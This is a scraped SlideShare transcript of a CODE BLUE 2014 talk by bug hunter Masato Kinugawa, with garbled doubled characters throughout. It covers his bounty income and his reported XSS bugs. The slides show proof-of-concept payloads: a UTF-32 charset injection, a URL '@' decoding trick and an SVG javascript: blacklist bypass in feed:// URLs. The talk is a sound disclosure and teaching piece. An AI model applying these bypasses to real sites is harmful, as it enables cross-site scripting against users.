BBuugg--hhuunntteerr’’ss
JJooyy
Masato	
  Kinugawa	
  
Name Masato Kinugawa
Nationality Japanese(maybe)
Hobby Listening Music and XSS
Profession BBuugg--hhuunntteerr
FFiirrsstt
BBuugg--HHuunntteerr’’ss LLiiffee aanndd
BBoouunnttyy PPrrooggrraamm
SSeeccoonndd DDeelliigghhttffuull BBuuggss...
BBuugg--hhuunntteerr’’ss LLiiffee aanndd
BBoouunnttyy PPrrooggrraamm
Workplace Home
Working
Hours
Any time I want
Work Finding Security Bugs
Income BBuugg BBoouunnttyy
➡Does it make enough mo...
2277113355334466 ((JJPPYY))
$$114422772233
(($$11 == 112200 JJPPYY))
2277113355334466 ((JJPPYY))
$$114422772233
(($$11 == 112200 JJPPYY))
((iinn OOccttaall ddiiggiittss))
! GGooooggllee launched in 2010
! Followed by MMaannyy CCoommppaanniieess
! GGooooggllee VVulnerability RReward PProgram
! 1 bug = $100~20,000
$$113300,,880033..77
TToottaall BBoouunnttiieess
NNuu...
EEvveenn mmoorree mmoottiivvaatteedd bbyy tthhee
iinnccrreeaasseedd bboouunnttyy rraatteess!!$	
  
II aamm aaccttuuaallllyy nniigghhtt oowwll……
! QQuuiicckk RReeppoossee since the program is
launched.
! CCoonnssiiddeerr NOT ONLY seriousness, but also
tthhee lleevvee...
! TThhee MMoosstt IImmppoorrttaanntt DDoommaaiinn ooff GGooooggllee
! Bounty was $$55,,000000 (Exceeds the regulated maxim...
https://accounts.google.com/example?oe=utf-‐‑‒32	
  
HTTP/1.1	
  200	
  OK	
  
Alternate-‐‑‒Protocol:	
  443:quic,p=0.01	
...
∀㸀㸀㰀㰀script㸀㸀alert(1)㰀㰀/script㸀㸀�
➊➊ AArrrraayy ooff tthhee BByytteess
❷❷
CChhaarraacctteerr CCooddee ooff tthhee
PPaaggee
❸❸ HHaannddlliinngg 00xx0000 CChh...
00	
  00	
  22	
  00	
  00	
  00	
  3E	
  00	
  00	
  00	
  3C	
  00	
  
00	
  00	
  00	
  73	
  00	
  00	
  00	
  63	
  0...
IE	
  does	
  not	
  support	
  UTF-‐‑‒32	
  
	
  ➡Character	
  Code	
  shall	
  be	
  “recognized”	
  to	
  be	
  
someth...
This “super great” web site provides the support
status of character codes, of all web browser
http://l0.cm/encodings/tabl...
IE(<=9) ignores the characters
➡the “00” are uunnddeerrssttoooodd aass nnootthhiinngg..
00	
  00	
  22	
  00	
  00	
  00	
...
Message from the web page
Seek browser and plug-in bugs also
������1�������
������1�������
������1�������
������1�������
������1�������
������1����1...
! 2288..77%% of total number of bugs I reported
! TThhee 8877%% ooff tthheemm aarree wwiitthh IIEE
! Take longer to fix
! Even if it is fixed, it is NOT likely to applied to
the different IE version.
Something is required...
location.href is aa mmeetthhoodd ttoo ggeett tthhee UURRLL ooff
tthhee ppaaggee by JavaScript
http://example.com/
http://e...
http://evil%2F@eexxaammppllee..ccoomm/
location.href is
http://eevviill/@example.com/
The URL part before @ is aauuttoomma...
AAllll ccooddeess iinncclluuddee llooccaattiioonn..hhrreeff ppooiinnttiinngg ttoo
sseellff--ddoommaaiinn aarree ppootteenn...
http://evil%2F@www.youtube.com/	
  
! Found ffaattaall bbuugg, at same time
! Exist in feed:// URL that represents RSS
! Can extract unrelated feed to any dom...
In feed:// URL, characters which can run
scripts are restricted.
(=Blacklist)
It is easy; jjuusstt ppaassssiinngg tthhrroo...
<a href="javascript:alert(1)">XSS</a>
<a>XSS</a>
FFiinndd oouutt tthhee cchhaarraacctteerrss wwhhiicchh ccaann ppaassss tt...
<svg>

<a xmlns:xlink="http://www.w3.org/1999/xlink"

xxlliinnkk::hhrreeff==""jjaavvaassccrriipptt::aalleerrtt((11))"">

<...
feed://l0.cm%2Fcb.rss%3F@codeblue.jp/	
  
feed://l0.cm%2Fcb.rss%3F@codeblue.jp/	
  
alert('CODE	
  BLUE、2回⽬目開催おめでとう!n'+	
  
document.domain+'から')	
  
(Congratulatio...
! Web applications are in jeopardies caused by
character codes, browser behaviors / bugs, and so
on…
! Finding out mysteri...
! Grow up in touch of computers.
! Love to disassemble anything
! Debut as XSS “attacker” in the 6th grade
! Grow up with in touch of computers.
	
  ➡	
  I	
  got	
  to	
  knew	
  what	
  is	
  binary	
  in	
  2009	
  
! Love to ...
Decided to ddoo wwhhaatt II wwaanntt,, iinn mmyy wwaayy
���������������������
~2009 A lot happened
 2010 Left computer voc...
What  I  want  to  do:  Seeking  vulnerabilities	
  
FFoouunndd ssoo lloott!!
Soon after, GGooooggllee llaauunncchheedd bu...
Bug	
  hunting	
  house-‐‑‒husband?	
  
	
  	
  ➡	
  Need	
  to	
  gain	
  girl	
  hunt	
  skill	
  also	
  ☺	
  
! Extens...
! Must spent most of the time to repeating
unsophisticated verification test
! No income unless find anything
! FFeeeellii...
TThhee ffiinnddiinngg sskkiillll iiss aallll wwhhaatt yyoouu nneeeedd
Can concentrate on to improving skill
CCaann ddoo bb...
 “Listen music” as a hobby
 “Bug-hunt” as a hobby (same as above)
““HHoobbbbyy””
Do anything you want! Then, you may
find ...
UUnnddeerrssttoooodd??!!
Thank	
  You!	
  
@kinugawamasato	
  
✉	
   masatokinugawa	
  [at]	
  gmail.com	
  
Contact	
  
CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa
CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa
CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa
CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa
CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa
CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa
Prochain SlideShare
Chargement dans…5
×

CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa

8 359 vues

Publié le

Recently, The number of enterprise which pays rewards for reporting security bugs is increasing. I am also received a large amount of rewards through the reward programs for reporting bugs. Actually, I earn a living with rewards, so it is not exaggeration to say that I am a professional bug hunter. I will make a speech such as how to be a professional bug hunter, actual of rules from the point of view of a positive attendance and how to discover vulnerabilities including technical topics.

Publié dans : Carrière
0 commentaire
7 j’aime
Statistiques
Remarques
  • Soyez le premier à commenter

Aucun téléchargement
Vues
Nombre de vues
8 359
Sur SlideShare
0
Issues des intégrations
0
Intégrations
4 714
Actions
Partages
0
Téléchargements
76
Commentaires
0
J’aime
7
Intégrations 0
Aucune incorporation

Aucune remarque pour cette diapositive

CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa

  1. 1. BBuugg--hhuunntteerr’’ss JJooyy Masato  Kinugawa  
  2. 2. Name Masato Kinugawa Nationality Japanese(maybe) Hobby Listening Music and XSS Profession BBuugg--hhuunntteerr
  3. 3. FFiirrsstt BBuugg--HHuunntteerr’’ss LLiiffee aanndd BBoouunnttyy PPrrooggrraamm SSeeccoonndd DDeelliigghhttffuull BBuuggss TThhiirrdd TThhee rreeaassoonnss wwhhyy II bbeeccaammee BBuugg--hhuunntteerr
  4. 4. BBuugg--hhuunntteerr’’ss LLiiffee aanndd BBoouunnttyy PPrrooggrraamm
  5. 5. Workplace Home Working Hours Any time I want Work Finding Security Bugs Income BBuugg BBoouunnttyy ➡Does it make enough money to live?
  6. 6. 2277113355334466 ((JJPPYY)) $$114422772233 (($$11 == 112200 JJPPYY))
  7. 7. 2277113355334466 ((JJPPYY)) $$114422772233 (($$11 == 112200 JJPPYY)) ((iinn OOccttaall ddiiggiittss))
  8. 8. ! GGooooggllee launched in 2010 ! Followed by MMaannyy CCoommppaanniieess
  9. 9. ! GGooooggllee VVulnerability RReward PProgram ! 1 bug = $100~20,000 $$113300,,880033..77 TToottaall BBoouunnttiieess NNuummbbeerr ooff bbuuggss rreeppoorrtteedd 112277((119911 including duplicated and/or not rewarded ones)
  10. 10. EEvveenn mmoorree mmoottiivvaatteedd bbyy tthhee iinnccrreeaasseedd bboouunnttyy rraatteess!!$  
  11. 11. II aamm aaccttuuaallllyy nniigghhtt oowwll……
  12. 12. ! QQuuiicckk RReeppoossee since the program is launched. ! CCoonnssiiddeerr NOT ONLY seriousness, but also tthhee lleevveell ooff ““iinntteerreessttiinngg””,, ooff tthhee bbuugg.. ! Require only ssiimmppllee eexxppllaannaattiioonn ttoo hhaavvee tthheemm uunnddeerrssttaanndd tthhee pprroobblleemm.. ! PPrroovviiddee ffuunn to the reporters.
  13. 13. ! TThhee MMoosstt IImmppoorrttaanntt DDoommaaiinn ooff GGooooggllee ! Bounty was $$55,,000000 (Exceeds the regulated maximum amount at that time)
  14. 14. https://accounts.google.com/example?oe=utf-‐‑‒32   HTTP/1.1  200  OK   Alternate-‐‑‒Protocol:  443:quic,p=0.01   Cache-‐‑‒Control:  private,  max-‐‑‒age=0   Content-‐‑‒Encoding:  gzip   Content-‐‑‒Type:  text/html;  charset=UTF-‐‑‒32   ...   ! Character Code can be set by URL ! UUTTFF--3322 was able to be set
  15. 15. ∀㸀㸀㰀㰀script㸀㸀alert(1)㰀㰀/script㸀㸀�
  16. 16. ➊➊ AArrrraayy ooff tthhee BByytteess ❷❷ CChhaarraacctteerr CCooddee ooff tthhee PPaaggee ❸❸ HHaannddlliinngg 00xx0000 CChhaarraacctteerrss
  17. 17. 00  00  22  00  00  00  3E  00  00  00  3C  00   00  00  00  73  00  00  00  63  00  00  00  72   00  00  00  69  00  00  00  70  00  00  00  74   00  00  3E  00  00  00  00  61  00  00  00  6C   00  00  00  65  00  00  00  72  00  00  00  74   00  00  00  28  00  00  00  31  00  00  00  29   00  00  3C  00  00  00  00  2F  00  00  00  73   00  00  00  63  00  00  00  72  00  00  00  69   00  00  00  70  00  00  00  74  00  00  3E  00   ∀㸀㸀㰀㰀� s  c    r� i    p    t� 㸀㸀a    l� e  r    t� (  1    )� 㰀㰀/    s� c  r    i� p  t  㸀㸀� In UTF-32, 1 character requires 4 bytes ➊�
  18. 18. IE  does  not  support  UTF-‐‑‒32    ➡Character  Code  shall  be  “recognized”  to  be   something   00  00  22  00  00  00  3E  00  00  00  3C  00   00  00  00  73  00  00  00  63  00  00  00  72   00  00  00  69  00  00  00  70  00  00  00  74   00  00  3E  00  00  00  00  61  00  00  00  6C   00  00  00  65  00  00  00  72  00  00  00  74   00  00  00  28  00  00  00  31  00  00  00  29   00  00  3C  00  00  00  00  2F  00  00  00  73   00  00  00  63  00  00  00  72  00  00  00  69   00  00  00  70  00  00  00  74  00  00  3E  00   ∀㸀㸀㰀㰀� s  c    r� i    p    t� 㸀㸀a    l� e  r    t� (  1    )� 㰀㰀/    s� c  r    i� p  t  㸀㸀� ❷
  19. 19. This “super great” web site provides the support status of character codes, of all web browser http://l0.cm/encodings/table/
  20. 20. IE(<=9) ignores the characters ➡the “00” are uunnddeerrssttoooodd aass nnootthhiinngg.. 00  00  22  00  00  00  3E  00  00  00  3C  00   00  00  00  73  00  00  00  63  00  00  00  72   00  00  00  69  00  00  00  70  00  00  00  74   00  00  3E  00  00  00  00  61  00  00  00  6C   00  00  00  65  00  00  00  72  00  00  00  74   00  00  00  28  00  00  00  31  00  00  00  29   00  00  3C  00  00  00  00  2F  00  00  00  73   00  00  00  63  00  00  00  72  00  00  00  69   00  00  00  70  00  00  00  74  00  00  3E  00   �  >  �� s  c    r� i    p  t� >  a  l� e  r    t� (  1    )� �  /  s� c  r    i� p  t  >� ❸
  21. 21. Message from the web page
  22. 22. Seek browser and plug-in bugs also ������1������� ������1������� ������1������� ������1������� ������1������� ������1����1�� ������1��1���� ������11������ ������1������� ������1������� ������1��1���� ������1����1�� ������1���1��� ������1�������������11������ ������11������ ������1����1�� ������1�����1� ������1������� ������1������� ������1����1�� ������1������� ������1������� ������1������� ������1������� ������1�������
  23. 23. ! 2288..77%% of total number of bugs I reported ! TThhee 8877%% ooff tthheemm aarree wwiitthh IIEE
  24. 24. ! Take longer to fix ! Even if it is fixed, it is NOT likely to applied to the different IE version. Something is required at the Web service level Therefore
  25. 25. location.href is aa mmeetthhoodd ttoo ggeett tthhee UURRLL ooff tthhee ppaaggee by JavaScript http://example.com/ http://example.com/ location.href
  26. 26. http://evil%2F@eexxaammppllee..ccoomm/ location.href is http://eevviill/@example.com/ The URL part before @ is aauuttoommaattiiccaallllyy ddeeccooddeedd!! ➡IItt ggeenneerraatteess UURRLL ppooiinnttss ttoo eexxtteerrnnaall WWeebb ssiittee
  27. 27. AAllll ccooddeess iinncclluuddee llooccaattiioonn..hhrreeff ppooiinnttiinngg ttoo sseellff--ddoommaaiinn aarree ppootteennttiiaallllyy vvuullnneerraabbllee Added characters before “@”, then checked any web pages if it send request to the external sites Therefore
  28. 28. http://evil%2F@www.youtube.com/  
  29. 29. ! Found ffaattaall bbuugg, at same time ! Exist in feed:// URL that represents RSS ! Can extract unrelated feed to any domain by ccuussttoommiizziinngg the part of URL before @. ! Put the scripts in the unrelated feeds, XSS works on the extracted domain WWee ccaann eennffoorrccee XXSSSS oonn aannyy wweebb ssiitteess \\((^^oo^^))// yyeeaahh☆☆ therefore
  30. 30. In feed:// URL, characters which can run scripts are restricted. (=Blacklist) It is easy; jjuusstt ppaassssiinngg tthhrroouugghh tthhee bbllaacckklliisstt! Things to do
  31. 31. <a href="javascript:alert(1)">XSS</a> <a>XSS</a> FFiinndd oouutt tthhee cchhaarraacctteerrss wwhhiicchh ccaann ppaassss tthhrroouugghh bbaasseedd oonn tthhee cchhaarraacctteerr rreemmoovvaall ppaatttteerrnn BBeeeeppiinngg!!
  32. 32. <svg>
 <a xmlns:xlink="http://www.w3.org/1999/xlink"
 xxlliinnkk::hhrreeff==""jjaavvaassccrriipptt::aalleerrtt((11))"">
 <rect width="1000" height="1000" />
 </a>
 </svg> SSiilleennccee……
  33. 33. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/  
  34. 34. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/   alert('CODE  BLUE、2回⽬目開催おめでとう!n'+   document.domain+'から')   (Congratulation  for   the  2nd  Code  Blue)  
  35. 35. ! Web applications are in jeopardies caused by character codes, browser behaviors / bugs, and so on… ! Finding out mysteriously complicated bugs is tthhee uullttiimmaattee ddeelliigghhtt.. You want to see more? http://masatokinugawa.l0.cm/
  36. 36. ! Grow up in touch of computers. ! Love to disassemble anything ! Debut as XSS “attacker” in the 6th grade
  37. 37. ! Grow up with in touch of computers.  ➡  I  got  to  knew  what  is  binary  in  2009   ! Love to disassemble anything    ➡  Donʼ’t  love  to  do  (so  lot)   ! Debut as XSS “attacker” in the 6th grade    ➡  I  got  interested  in  security  in  2009  
  38. 38. Decided to ddoo wwhhaatt II wwaanntt,, iinn mmyy wwaayy ��������������������� ~2009 A lot happened  2010 Left computer vocational school
  39. 39. What  I  want  to  do:  Seeking  vulnerabilities   FFoouunndd ssoo lloott!! Soon after, GGooooggllee llaauunncchheedd bug bounty program Spent all waking hours to find vulnerabilities.
  40. 40. Bug  hunting  house-‐‑‒husband?      ➡  Need  to  gain  girl  hunt  skill  also  ☺   ! Extension  of  what    I  want  to  do   ! Found  my  self  as  bug̶—hunter,  one  day   WWiisshh ffoorr ffuuttuurree……
  41. 41. ! Must spent most of the time to repeating unsophisticated verification test ! No income unless find anything ! FFeeeelliinngg aaccccoommpplliisshhmmeenntt iiss ggrreeaatt, as what I achieved, directly become money ! NNootthhiinngg iinn tthhee wwoorrlldd ttoo ffeeeell ddeelliigghhtt like treasure hunting. ! Abnormal behaviors are mmuucchh ffuunn ttoo sseeee However…
  42. 42. TThhee ffiinnddiinngg sskkiillll iiss aallll wwhhaatt yyoouu nneeeedd Can concentrate on to improving skill CCaann ddoo bbyy yyoouurrsseellff Almost no human relationship issue CCaann ddoo aatt yyoouurr hhoommee No commuting time CCaann wwoorrkk aatt oowwnn ppaaccee Can do when you want
  43. 43.  “Listen music” as a hobby  “Bug-hunt” as a hobby (same as above) ““HHoobbbbyy”” Do anything you want! Then, you may find your own way. FFoorr tthhoossee wwhhoo aarree ttrryyiinngg ttoo ffiinndd yyoouurr wwaayy......
  44. 44. UUnnddeerrssttoooodd??!!
  45. 45. Thank  You!   @kinugawamasato   ✉   masatokinugawa  [at]  gmail.com   Contact  

×